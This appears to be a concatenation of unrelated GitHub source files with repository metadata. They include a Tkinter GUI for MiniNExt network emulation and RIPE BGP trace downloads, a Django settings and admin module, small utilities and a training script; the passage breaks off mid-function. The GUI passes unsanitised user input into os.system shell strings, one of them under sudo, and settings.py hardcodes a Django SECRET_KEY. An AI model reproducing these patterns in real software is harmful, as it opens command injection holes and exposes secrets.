Tkinter.Label(self.root, height=2,width=40,font=('arial', 11, 'bold'), text="Ingresee el nombre de la base").pack()
self.baseName = Tkinter.Entry(self.root, width=20)
self.baseName.pack(padx=50)
Tkinter.Label(self.root, height=2,width=30,font=('arial', 11, 'bold'), text="Seleccione el algoritmo utilizado").pack()
self.L3 = Tkinter.Listbox(self.root, height=10)
self.L3.pack()
self.algorithm=["FM","RR_Sep", "RR_SepD", "RR_SepS", "RR_Bates", "RR_BatesY", "RR_BatesZ", "RR_Zhang"]
self.L3.insert(Tkinter.END, self.algorithm[0]);self.L3.insert(Tkinter.END, self.algorithm[1]);self.L3.insert(Tkinter.END, self.algorithm[2]);
self.L3.insert(Tkinter.END, self.algorithm[3]); self.L3.insert(Tkinter.END, self.algorithm[4]);self.L3.insert(Tkinter.END, self.algorithm[5]);
self.L3.insert(Tkinter.END, self.algorithm[6]); self.L3.insert(Tkinter.END, self.algorithm[7])
self.L3.select_set(0)
Tkinter.Button(self.root, text="Cargar BD", command=self.onClickB7, font=('arial', 12)).pack()
def onClickB7(self):
if self.baseName.get() != "" :
print "Cargar base"
print "python loadDB.py "+self.directory+" "+self.baseName.get() +" "+ self.algorithm[self.L3.curselection()[0]]
os.system("python loadDB.py "+self.directory+" "+self.baseName.get() +" "+ self.algorithm[self.L3.curselection()[0]])
self.root.destroy()
self.labelVariable.set(" Topology Tools v1.0")
else:
print "WARNING: Falto completar un campo"
#####################BOTON B4#########################
def OnButtonClickB4(self):
self.labelVariable.set("Borrar archivos temporales generados por tcpdump" )
self.directory = tkFileDialog.askdirectory(parent=self,title='Seleccione la ubicacion de la carpeta mininext')
if self.directory != "":
print "Borrando archivos temporales de la carpeta "+ self.directory
os.system("python deleteTemporaryFiles.py "+self.directory)
self.labelVariable.set(" Topology Tools v1.0")
#####################BOTON B5#########################
def OnButtonClickB5(self):
self.labelVariable.set("Empezar emulación con MiniNExt" )
self.directory = tkFileDialog.askdirectory(parent=self,title='Seleccione la ubicacion de la carpeta generada')
if self.directory != "":
print "Running sudo python "+ self.directory + "/start.py"
os.system("sudo python "+ self.directory + "/start.py")
#####################BOTON B6#########################
def OnButtonClickB6(self):
self.labelVariable.set("Descargar Trazas BGP desde www.ripe.net" )
self.directory = tkFileDialog.askdirectory(parent=self,title='Seleccione la ubicacion donde descargar la traza')
if self.directory != "":
self.root = Tkinter.Tk()
self.root.eval('tk::PlaceWindow %s center' % self.root.winfo_pathname(self.root.winfo_id()))
self.root.title("TRAZA BGP")
Tkinter.Label(self.root, height=2,width=40,font=('arial', 11, 'bold'), text="Seleccione el origen de la traza").pack()
self.opM = ttk.Combobox(self.root, width=10, values=[ "rrc00" ,"rrc01", "rrc02", "rrc03","rrc04","rrc05","rrc06","rrc07","rrc08","rrc09","rrc10","rrc11","rrc12","rrc13","rrc14","rrc15","rrc16"])
self.opM.current(0)
self.opM.pack()
Tkinter.Label(self.root, height=2,width=40,font=('arial', 11, 'bold'), text="Seleccione el día").pack()
self.calendar = ttkcalendar.Calendar(self.root)
self.calendar.pack()
Tkinter.Label(self.root, height=2,width=40,font=('arial', 11, 'bold'), text="Seleccione la hora").pack()
lstHours=[]
cont=0;
for i in range(0,24):
for j in range(0,12):
if (j <= 1):
valor=str(0)+str(j*5)
else:
valor=str(j*5)
valor=str(i)+":"+valor
if (i <= 9):
valor=str(0)+valor
lstHours.insert(cont,valor)
cont+=1
Tkinter.Label(self.root, height=2,width=40,font=('arial', 11), text="Hora Inicio").pack()
self.opHourMin = ttk.Combobox(self.root, width=5,values=lstHours)
self.opHourMin.current(0)
self.opHourMin.pack()
Tkinter.Label(self.root, height=2,width=40,font=('arial', 11), text="Hora Fin").pack()
self.opHourMax = ttk.Combobox(self.root, width=5,values=lstHours)
self.opHourMax.current(0)
self.opHourMax.pack()
buttonCalendar = Tkinter.Button(self.root, text="Aceptar", command=self.onClickCalendar).pack(side=Tkinter.RIGHT)
buttonCancel = Tkinter.Button(self.root, text="Cancelar", command=self.root.destroy).pack(side=Tkinter.LEFT)
def onClickCalendar(self):
date= str(self.calendar.selection).split(" ")[0]
#E.g.: python downloadFromRipe.py rrc00 2014-02-15 16:45 17:10 /home/
print "python downloadFromRipe.py "+self.opM.get()+" "+date+" "+self.opHourMin.get()+" "+self.opHourMax.get()+" "+self.directory
os.system("python downloadFromRipe.py "+self.opM.get()+" "+date+" "+self.opHourMin.get()+" "+self.opHourMax.get()+" "+self.directory)
self.root.eval('::ttk::CancelRepeat')
self.root.destroy()
self.labelVariable.set(" Topology Tools v1.0")
if __name__ == "__main__":
app = simpleapp_tk(None)
app.title('Topology Tools')
app.mainloop()
|
[
"noreply@github.com"
] |
cuchy.noreply@github.com
|
54b3d5db7d4193b1ac06c3eb01d62a626a47d055
|
118217dbc4d2e78f9fdf54fb652309708effa673
|
/app/app/settings.py
|
a444feed928e83d5a84443c4e23b4910660ea23e
|
[
"MIT"
] |
permissive
|
Mimicx/recipe-app-api
|
68f1d40aee64212823ff5e91a3fa3cd6e51b459f
|
4aa0ad098d414861b628e50948b741dc56a5847a
|
refs/heads/master
| 2020-12-04T15:01:06.894710
| 2020-04-27T08:10:32
| 2020-04-27T08:10:32
| 231,809,804
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,241
|
py
|
"""
Django settings for app project.
Generated by 'django-admin startproject' using Django 2.1.15.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '(d3+ugse4m4p-(h2jy5eh#&w*++fj*1^^ifrf6j8yr4gm5i#j#'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'core',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'app.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'app.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql',
'HOST': os.environ.get('DB_HOST'),
'NAME': os.environ.get('DB_NAME'),
'USER': os.environ.get('DB_USER'),
'PASSWORD': os.environ.get('DB_PASS')
}
}
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_URL = '/static/'
AUTH_USER_MODEL = 'core.User'
|
[
"mimic@MacBook-Pro-de-Mimic.local"
] |
mimic@MacBook-Pro-de-Mimic.local
|
7ef805e48e0b8adaf86af6ff894ad57d90a8dabe
|
334e7e8b9162cd74e1c9dd115a6e293f01051454
|
/src/profiles/admin.py
|
2ded111a3ce3a2b08cab6f2e78f67dd609b0352c
|
[
"MIT"
] |
permissive
|
contactr2m/remote_repo
|
dec0dff9c299ab665cd36642a757ae9fa35950c3
|
5665c55b794929fd40645264c5c149e64d172097
|
refs/heads/master
| 2021-01-10T13:13:47.359357
| 2016-04-26T14:23:49
| 2016-04-26T14:23:49
| 53,814,820
| 0
| 0
| null | 2016-03-20T19:37:37
| 2016-03-14T00:13:06
|
Python
|
UTF-8
|
Python
| false
| false
| 1,084
|
py
|
from __future__ import unicode_literals
from django.contrib import admin
#from authtools.admin import NamedUserAdmin
from .models import Profile
from django.contrib.auth import get_user_model
from django.core.urlresolvers import reverse
from accounts.admin import EmailUserAdmin
User = get_user_model()
class UserProfileInline(admin.StackedInline):
model = Profile
class NewUserAdmin(EmailUserAdmin):
inlines = [UserProfileInline]
list_display = ('is_active', 'email', 'first_name', 'last_name', 'display_name', 'permalink',
'is_superuser', 'is_staff',)
# 'View on site' didn't work since the original User model needs to
# have get_absolute_url defined. So showing on the list display
# was a workaround.
def permalink(self, obj):
url = reverse("profiles:show",
kwargs={"slug": obj.profile.slug})
# Unicode hex b6 is the Pilcrow sign
return '<a href="{}">{}</a>'.format(url, '\xb6')
permalink.allow_tags = True
admin.site.unregister(User)
admin.site.register(User, NewUserAdmin)
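# --- Illustrative sketch of the alternative mentioned in the comment above: giving the
# user model a get_absolute_url so the admin's "View on site" link works directly.
# This is a hypothetical method, not part of the original project.
def _example_get_absolute_url(self):
    return reverse("profiles:show", kwargs={"slug": self.profile.slug})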
|
[
"contactr2m@gmail.com"
] |
contactr2m@gmail.com
|
c77fc7c74aee8e33dbb0111a5d71f763ecb0cb21
|
b0015342f71f027a63630b0e3d76c8b1a24088a2
|
/srnet/utils/__init__.py
|
f498b8ecabd11961a34814af7e37aa1f1b32a691
|
[] |
no_license
|
sean-rice/srnet
|
476804f1f20d2e2b9d124e849cc6804e2b5ea878
|
6cf1b0232c081e1e8e02073402cd4f6910100255
|
refs/heads/master
| 2023-09-05T01:36:21.727479
| 2021-05-24T22:33:22
| 2021-05-24T22:33:22
| 283,088,184
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 59
|
py
|
from . import _utils, image, image_list, patchable_wrapper
|
[
"contact@sean.ee"
] |
contact@sean.ee
|
ec639ec794b8162d801d6bc692154bb82195da7c
|
5294915919042b56505a01ed64b579a2c3788647
|
/DS_SJE_utils.py
|
f4526d5a19652cf71e6686319c002428521a39dd
|
[] |
no_license
|
JinHyeopLee/DS_SJE_tensorflow
|
bd67a6765015b3602f13ce0dd5220835f4523239
|
06f17e822bee1bddfa58fa91fc91305462d1078d
|
refs/heads/master
| 2020-04-07T07:04:52.643075
| 2018-12-05T15:05:03
| 2018-12-05T15:05:03
| 158,162,731
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 598
|
py
|
import numpy as np
def append_nparr(arr1, arr2, axis=0):
if arr1 is None:
arr1 = arr2
else:
arr1 = np.append(arr1, arr2, axis=axis)
return arr1
def random_select(class_num, num_entity_each_class):
random_offset = np.random.randint(0, num_entity_each_class[class_num])
class_base_num = 0
for i in range(len(num_entity_each_class)):
if i == class_num:
break
class_base_num += num_entity_each_class[i]
return class_base_num + random_offset
# def int_to_float(tuple):
# return tuple[0], np.float32(tuple[1]), tuple[2]
|
[
"jhlee7467@gmail.com"
] |
jhlee7467@gmail.com
|
e2f166eb27eec77732a009850684325baf47550c
|
148f5fb80cb7640dbd4419617f1f002cd6b641bf
|
/MP4-HadoopMapReduce/TopTitleStatisticsMapper.py
|
43f9404508a4053c503e19c3962ab525dd6dd767
|
[] |
no_license
|
nhtrinh2/Cloud-Computing-and-Big-Data
|
7e6ec7811f42188ed181bb72b3be7768f7546480
|
c51e48e96660d7ed67f9812017124d30453a6f0a
|
refs/heads/master
| 2023-03-17T02:57:58.801203
| 2020-04-19T19:21:57
| 2020-04-19T19:21:57
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 172
|
py
|
#!/usr/bin/env python3
import sys
for line in sys.stdin:
word, value = line.strip().split('\t')
print('%s\t%s' % ('count', value)) # pass this output to reducer
|
[
"hongfeili365@gmail.com"
] |
hongfeili365@gmail.com
|
3fa5adf81091340c3211190e48597e99715da11a
|
0723805aecf730d6762456651430ac222b5548b2
|
/codechef/MARCH13_TOTR.py
|
5e1cc0bae539be9ab3f3c7829ad028d2f7aeb10a
|
[] |
no_license
|
nemausus/topcoder
|
4979ba2b626cd23423891b5e126a30dbfc47960f
|
946bccc7847a6ac3177a5a7bb70917980a2912ee
|
refs/heads/master
| 2020-12-29T02:40:15.540203
| 2017-06-09T06:01:38
| 2017-07-07T21:45:21
| 7,567,126
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 619
|
py
|
# https://www.codechef.com/MARCH13/status/TOTR,nemausus
# https://www.codechef.com/viewplaintext/1890676
import string
a,b = raw_input().split()
t = int(a)
translation = str(b)
dictionary = {'_':' '}
allTheLetters = string.lowercase
for i in range(26):
dictionary[allTheLetters[i]] = translation[i]
dictionary[allTheLetters[i].upper()] = translation[i].upper()
for i in range(t):
inp = list(str(raw_input()))
length = len(inp)
for i in range(length):
try:
inp[i] = dictionary[inp[i]]
except KeyError:
dictionary[inp[i]] = inp[i]
print "".join(inp)
|
[
"naresh.kumar@thoughtspot.com"
] |
naresh.kumar@thoughtspot.com
|
973d2f5af01158d20e8d8e0401dd4a38bffe70c1
|
a4fd8c01606641424faca66cae651b2670a863d7
|
/postfinancecheckout/models/customers_presence.py
|
904e7a50b40d1e730de795f474b2417c870457c4
|
[
"Apache-2.0"
] |
permissive
|
pfpayments/python-sdk
|
c435a4519a5a95a46cb6e446a4a8c83aeb9dcc2d
|
2d6b1429f5a4cafe61dcf5ea2c2a698848a837e0
|
refs/heads/master
| 2023-08-07T17:05:20.864000
| 2023-07-20T14:41:34
| 2023-07-20T14:41:34
| 251,532,627
| 2
| 0
|
Apache-2.0
| 2022-10-26T08:40:23
| 2020-03-31T07:38:00
|
Python
|
UTF-8
|
Python
| false
| false
| 207
|
py
|
# coding: utf-8
from enum import Enum, unique
@unique
class CustomersPresence(Enum):
NOT_PRESENT = "NOT_PRESENT"
VIRTUAL_PRESENT = "VIRTUAL_PRESENT"
PHYSICAL_PRESENT = "PHYSICAL_PRESENT"
|
[
"thomas.hunziker@customweb.com"
] |
thomas.hunziker@customweb.com
|
e5ace796de9aa6a3eed2fe626a7ccff896fcd712
|
c73f43dde251d83cf889f0d056559e601fe134e2
|
/test/baike_spider/url_manager.py
|
511a948ae3cbfa4bc8c2ef308da751d598b27ead
|
[] |
no_license
|
zhangyang183487/awesome-python3-webapp
|
bedd2bd2689abb130720afcfbd80f1a7adcab4c7
|
96e8e02a6fdb75a57a92259ad2c78c3593ef535a
|
refs/heads/master
| 2020-04-28T21:27:49.228349
| 2019-06-19T07:56:02
| 2019-06-19T07:56:02
| 175,582,604
| 0
| 0
| null | 2019-06-19T07:56:03
| 2019-03-14T08:46:26
|
Python
|
UTF-8
|
Python
| false
| false
| 867
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
class UrlManager(object):
def __init__(self):
self.new_urls = set()
self.old_urls = set()
# add a new url
def add_new_url(self, url):
if url is None:
return
if url not in self.new_urls and url not in self.old_urls:
self.new_urls.add(url)
# add a batch of new urls
def add_new_urls(self, urls):
if urls is None or len(urls) == 0:
return
for url in urls:
if url not in self.new_urls and url not in self.old_urls:
self.new_urls.add(url)
# whether there are still unprocessed urls
def has_new_url(self):
return len(self.new_urls) > 0
# get one new url
def get_new_url(self):
new_url = self.new_urls.pop();
self.old_urls.add(new_url)
return new_url
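# --- Illustrative usage of UrlManager (the URL below is a placeholder, not from the
# original crawler):
if __name__ == '__main__':
    manager = UrlManager()
    manager.add_new_url("http://example.com/page-1")
    while manager.has_new_url():
        print(manager.get_new_url())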
|
[
"zhangyang183487@hollysys.com"
] |
zhangyang183487@hollysys.com
|
d1f9c5d8fe6a52dd2e130204f45e94850dfa5e0f
|
33f86c1678d2f5e15da77885e0bf770f405201a4
|
/tcamp/local_settings.example.py
|
b5b48f86971536c25ec25d5c61d13c2805a1304e
|
[
"BSD-3-Clause"
] |
permissive
|
imclab/tcamp
|
5410c9549ed7731575e7312acfed7b8e4cd0c58d
|
111cabab90b2c8cf651ee480520bc43a33f30844
|
refs/heads/master
| 2021-01-18T12:15:58.484183
| 2014-03-05T21:36:00
| 2014-03-05T21:36:06
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,832
|
py
|
DEBUG = True
ADMINS = (
('', ''),
)
MANAGERS = ADMINS
INTERNAL_IPS = ('127.0.0.1', )
SECRET_KEY = ''
DATABASES = {
'local': {
'ENGINE': '', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': '', # Or path to database file if using sqlite3.
'USER': '', # Not used with sqlite3.
'PASSWORD': '', # Not used with sqlite3.
'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '', # Set to empty string for default. Not used with sqlite3.
},
'staging': {
'ENGINE': '', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': '', # Or path to database file if using sqlite3.
'USER': '', # Not used with sqlite3.
'PASSWORD': '', # Not used with sqlite3.
'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '', # Set to empty string for default. Not used with sqlite3.
},
'production': {
'ENGINE': '', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': '', # Or path to database file if using sqlite3.
'USER': '', # Not used with sqlite3.
'PASSWORD': '', # Not used with sqlite3.
'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '', # Set to empty string for default. Not used with sqlite3.
}
}
DATABASES['default'] = DATABASES['local']
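# --- Illustrative example (hypothetical values) of a 'local' entry filled in for
# sqlite3, following the inline comments above; it is assigned to a throwaway name so
# the template above stays untouched:
_EXAMPLE_SQLITE_LOCAL = {
    'ENGINE': 'django.db.backends.sqlite3',
    'NAME': 'tcamp.sqlite3',  # path to the database file when using sqlite3
    'USER': '',               # not used with sqlite3
    'PASSWORD': '',           # not used with sqlite3
    'HOST': '',               # not used with sqlite3
    'PORT': '',               # not used with sqlite3
}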
FAVICON = ''
APPLE_TOUCH_ICON = ''
SHARING_IMAGE = ''
FB_APP_ID = ''
GOOGLE_ANALYTICS_ID = ''
AWS_ACCESS_KEY_ID = ''
AWS_SECRET_ACCESS_KEY = ''
ASSET_SITE_VERSION = '1.0'
COMPRESS_URL = ''
COMPRESS_STORAGE = ''
STATICFILES_STORAGE = COMPRESS_STORAGE
STATIC_URL = COMPRESS_URL
POSTMARK_API_KEY = ''
POSTMARK_SENDER = ''
GOOGLEAUTH_DOMAIN = ''
GOOGLEAUTH_REALM = ''
TWITTER_CONSUMER_KEY = ''
TWITTER_CONSUMER_SECRET = ''
FACEBOOK_APP_ID = ''
FACEBOOK_API_SECRET = ''
GOOGLE_OAUTH2_CLIENT_ID = ''
GOOGLE_OAUTH2_CLIENT_SECRET = ''
GITHUB_APP_ID = ''
GITHUB_API_SECRET = ''
DISQUS_CLIENT_ID = ''
DISQUS_CLIENT_SECRET = ''
AKISMET_KEY = ''
TWITTER_CONSUMER_KEY = ''
TWITTER_CONSUMER_SECRET = ''
TWITTER_ACCESS_KEY = ''
TWITTER_ACCESS_SECRET = ''
DISQUS_SHORTNAME = ''
BRAINSTORM_USE_DISQUS = True
BRAINSTORM_LOGIN_OPTIONS = (
('Twitter', '/login/twitter/'),
('Facebook', '/login/facebook/'),
('Google', '/login/google-oauth2/'),
('Github', '/login/github/'),
)
VARNISH_MANAGEMENT_ADDRS = ()
TWILIO_ACCOUNT_SID = ''
TWILIO_AUTH_TOKEN = ''
RAVEN_CONFIG = {
'dsn': '',
}
|
[
"dan.drinkard@gmail.com"
] |
dan.drinkard@gmail.com
|
26788b2b41f458fe7a22cf558196deec2b03846b
|
8a870098382dce7bf59ed046908ed369e5045662
|
/Problem_Solving/Algorithms/Implementation/8_Migratory_Birds/Solution.py
|
0a2caf5509caf83a3adb2d89c9229e6dfabb8d49
|
[
"MIT"
] |
permissive
|
CFLSousa/HackerRank
|
794318b3c4903f9f625848dfcd00d7d52b0bf748
|
29ed039634e88d72981b2ecd619e5c65d37111e4
|
refs/heads/master
| 2021-08-17T10:31:54.739339
| 2020-04-13T16:11:36
| 2020-04-13T16:11:36
| 159,576,300
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 692
|
py
|
import math
import os
import random
import re
import sys
def migratoryBirds(arr):
countersLen=5
maxCounter=0
maxCounterIndex=0
counters=[0 for x in range(countersLen)]
for k,birdType in enumerate(arr):
counters[birdType-1]+=1
for index,counterVal in enumerate(counters):
if counterVal>maxCounter:
maxCounter=counterVal
maxCounterIndex=index
return maxCounterIndex+1
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
arr_count = int(input().strip())
arr = list(map(int, input().rstrip().split()))
result = migratoryBirds(arr)
fptr.write(str(result) + '\n')
fptr.close()
|
[
"zizo2@sapo.pt"
] |
zizo2@sapo.pt
|
3dcaa933be418416fe87dd55f3819f52ea48c329
|
4460086c7817c8f952d9f532cbbc01770a8f7d83
|
/hello.py
|
103ce431c728a675fd31464b1e1075071aeab4b4
|
[
"MIT"
] |
permissive
|
qianjing2020/twitoff
|
d3c926f153513a83df728aa8722412ef14856070
|
a223e8f4a3dfecd582c18c92f8ac9212a01d4570
|
refs/heads/main
| 2023-04-17T05:39:41.990743
| 2021-05-02T02:52:04
| 2021-05-02T02:52:04
| 311,975,367
| 0
| 0
|
MIT
| 2020-11-28T03:25:16
| 2020-11-11T13:14:38
| null |
UTF-8
|
Python
| false
| false
| 228
|
py
|
# hello.py
from flask import Flask
app = Flask(__name__)
# print(__name__)
# print(type(app))
@app.route("/")
def index():
x = 2 + 2
return f"Hello World! {x}"
@app.route("/about")
def about():
return "About me"
|
[
"qianjing2020@users.noreply.github.com"
] |
qianjing2020@users.noreply.github.com
|
f9ff82f3afadebdc0f2fa82b4a0f19227d7cf918
|
67a10f3384d5048bbc0e46c0535b0c113d78c2fa
|
/examples/implicit_orientation_learning/train.py
|
0e435a1228d1816889983ad832d23c56eaed8537
|
[
"MIT"
] |
permissive
|
DeepanChakravarthiPadmanabhan/fer
|
af9bc6b65bf6d265c63d107b0f11ab0c09002390
|
920268633aa0643416551212ec2d70f3591b5001
|
refs/heads/master
| 2023-09-05T03:04:50.468845
| 2021-11-09T23:42:54
| 2021-11-09T23:42:54
| 426,337,368
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,135
|
py
|
import os
import glob
import json
import argparse
from tensorflow.keras.callbacks import EarlyStopping, ReduceLROnPlateau
from tensorflow.keras.callbacks import CSVLogger, ModelCheckpoint
from tensorflow.keras.optimizers import Adam
from paz.backend.image import write_image
from paz.abstract import GeneratingSequence
from paz.optimization.callbacks import DrawInferences
from paz.pipelines import AutoEncoderPredictor
from scenes import SingleView
from pipelines import DomainRandomization
from model import AutoEncoder
description = 'Training script for learning implicit orientation vector'
root_path = os.path.join(os.path.expanduser('~'), '.keras/paz/')
parser = argparse.ArgumentParser(description=description)
parser.add_argument('-op', '--obj_path', type=str, help='Path of 3D OBJ model',
default=os.path.join(
root_path,
'datasets/ycb/models/035_power_drill/textured.obj'))
parser.add_argument('-cl', '--class_name', default='035_power_drill', type=str,
help='Class name to be added to model save path')
parser.add_argument('-id', '--images_directory', type=str,
help='Path to directory containing background images',
default=os.path.join(
root_path, 'datasets/voc-backgrounds/'))
parser.add_argument('-bs', '--batch_size', default=32, type=int,
help='Batch size for training')
parser.add_argument('-lr', '--learning_rate', default=0.001, type=float,
help='Initial learning rate for Adam')
parser.add_argument('-is', '--latent_dimension', default=128, type=int,
help='Latent dimension of the auto-encoder')
parser.add_argument('-ld', '--image_size', default=128, type=int,
help='Size of the side of a square image e.g. 64')
parser.add_argument('-sp', '--stop_patience', default=7, type=int,
help='Number of epochs before doing early stopping')
parser.add_argument('-pp', '--plateau_patience', default=3, type=int,
help='Number of epochs before reducing learning rate')
parser.add_argument('-e', '--max_num_epochs', default=10000, type=int,
help='Maximum number of epochs before finishing')
parser.add_argument('-st', '--steps_per_epoch', default=1000, type=int,
help='Steps per epoch')
parser.add_argument('-sh', '--top_only', default=0, choices=[0, 1], type=int,
help='Flag for full sphere or top half for rendering')
parser.add_argument('-ls', '--loss', default='binary_crossentropy', type=str,
help='tf.keras loss function name to be used')
parser.add_argument('-r', '--roll', default=3.14159, type=float,
help='Threshold for camera roll in radians')
parser.add_argument('-s', '--shift', default=0.05, type=float,
help='Threshold of random shift of camera')
parser.add_argument('-d', '--depth', nargs='+', type=float,
default=[0.3, 0.5],
help='Distance from camera to origin in meters')
parser.add_argument('-fv', '--y_fov', default=3.14159 / 4.0, type=float,
help='Field of view angle in radians')
parser.add_argument('-l', '--light', nargs='+', type=float,
default=[.5, 30],
help='Light intensity from poseur')
parser.add_argument('-oc', '--num_occlusions', default=2, type=int,
help='Number of occlusions')
parser.add_argument('-sa', '--save_path',
default=os.path.join(
os.path.expanduser('~'), '.keras/paz/models'),
type=str, help='Path for writing model weights and logs')
args = parser.parse_args()
# setting optimizer and compiling model
latent_dimension = args.latent_dimension
model = AutoEncoder((args.image_size, args.image_size, 3), latent_dimension)
optimizer = Adam(args.learning_rate, amsgrad=True)
model.compile(optimizer, args.loss, metrics=['mse'])
model.summary()
# setting scene
renderer = SingleView(args.obj_path, (args.image_size, args.image_size),
args.y_fov, args.depth, args.light, bool(args.top_only),
args.roll, args.shift)
# creating sequencer
image_paths = glob.glob(os.path.join(args.images_directory, '*.png'))
processor = DomainRandomization(
renderer, args.image_size, image_paths, args.num_occlusions)
sequence = GeneratingSequence(processor, args.batch_size, args.steps_per_epoch)
# making directory for saving model weights and logs
model_name = '_'.join([model.name, str(latent_dimension), args.class_name])
save_path = os.path.join(args.save_path, model_name)
if not os.path.exists(save_path):
os.makedirs(save_path)
# setting callbacks
log = CSVLogger(os.path.join(save_path, '%s.log' % model_name))
stop = EarlyStopping('loss', patience=args.stop_patience, verbose=1)
plateau = ReduceLROnPlateau('loss', patience=args.plateau_patience, verbose=1)
model_path = os.path.join(save_path, '%s_weights.hdf5' % model_name)
save = ModelCheckpoint(
model_path, 'loss', verbose=1, save_best_only=True, save_weights_only=True)
# setting drawing callbacks
images = (sequence.__getitem__(0)[0]['input_image'] * 255).astype('uint8')
for arg, image in enumerate(images):
image_name = 'image_%03d.png' % arg
image_path = os.path.join(save_path, 'original_images/' + image_name)
write_image(image_path, image)
inferencer = AutoEncoderPredictor(model)
draw = DrawInferences(save_path, images, inferencer)
# saving hyper-parameters and model summary as text files
print(save_path)
with open(os.path.join(save_path, 'hyperparameters.json'), 'w') as filer:
json.dump(args.__dict__, filer, indent=4)
with open(os.path.join(save_path, 'model_summary.txt'), 'w') as filer:
model.summary(print_fn=lambda x: filer.write(x + '\n'))
# model optimization
model.fit_generator(
sequence,
steps_per_epoch=args.steps_per_epoch,
epochs=args.max_num_epochs,
callbacks=[stop, log, save, plateau, draw],
verbose=1,
workers=0)
|
[
"deepangrad@gmail.com"
] |
deepangrad@gmail.com
|
4b2654ba6bffd9e20cf44a960e8ed5166476ba81
|
749aca95edfaad9e7d8b84dc2c6f62038595efc3
|
/mandala.py
|
dac1d0eae959c6a652cc1f391088ca60e9419b56
|
[] |
no_license
|
xmduhan/mandala
|
efe72b116ec829457cd2286b88b4544d5538861c
|
eafea6c9ebd0ca913c070f0bf2cbf72a6566b0a7
|
refs/heads/master
| 2021-06-30T16:30:49.410637
| 2017-09-20T09:44:53
| 2017-09-20T09:44:53
| 104,153,412
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,494
|
py
|
#!/usr/bin/env python
# encoding: utf-8
import dataset
from pyfiglet import Figlet
from termcolor import cprint
from prompt_toolkit import prompt as _prompt
from prompt_toolkit.history import InMemoryHistory
from itertools import count
from treelib import Tree
from pandas import DataFrame
history = InMemoryHistory()
db = dataset.connect('sqlite:///db.sqlite')
table = db['relation']
db.begin()
def commit():
    """Commit the pending changes and start a new transaction."""
    db.commit()
    db.begin()
    print u'Saved successfully!'
def rollback():
    """Discard the pending changes and start a new transaction."""
    db.rollback()
    db.begin()
    print u'Operation rolled back'
def save(w0, w1):
    """Insert a relation w0 --> w1 and echo it."""
table.insert({'w0': w0, 'w1': w1})
# print u'%s --> %s: ' % (w0, w1)
cprint(' |-- ', 'green', end='')
cprint('%s --> %s: ' % (w0, w1), color='blue', end='')
cprint('+1', 'red')
def prompt(text):
return _prompt(text, history=history).strip()
def star(w0=None):
    """Star-style add: link one keyword to many follow-up words."""
    if w0 is None:
        w0 = prompt(u'Keyword: ')
if len(w0) == 0:
return
for i in count(start=1, step=1):
w1 = prompt(u'%s --> (%d):' % (w0, i))
if len(w1) == 0:
break
save(w0, w1)
def chain(w0=None):
    """Chain-style add: each new word becomes the next keyword."""
    if w0 is None:
        w0 = prompt(u'Keyword: ')
if len(w0) == 0:
return
for i in count(start=1, step=1):
w1 = prompt(u'%s --> (%d):' % (w0, i))
if len(w1) == 0:
break
save(w0, w1)
w0 = w1
def readLevel():
while True:
        levelString = prompt(u'Maximum recursion depth (3): ')
if len(levelString) == 0:
levelString = 3
try:
level = int(levelString)
return level
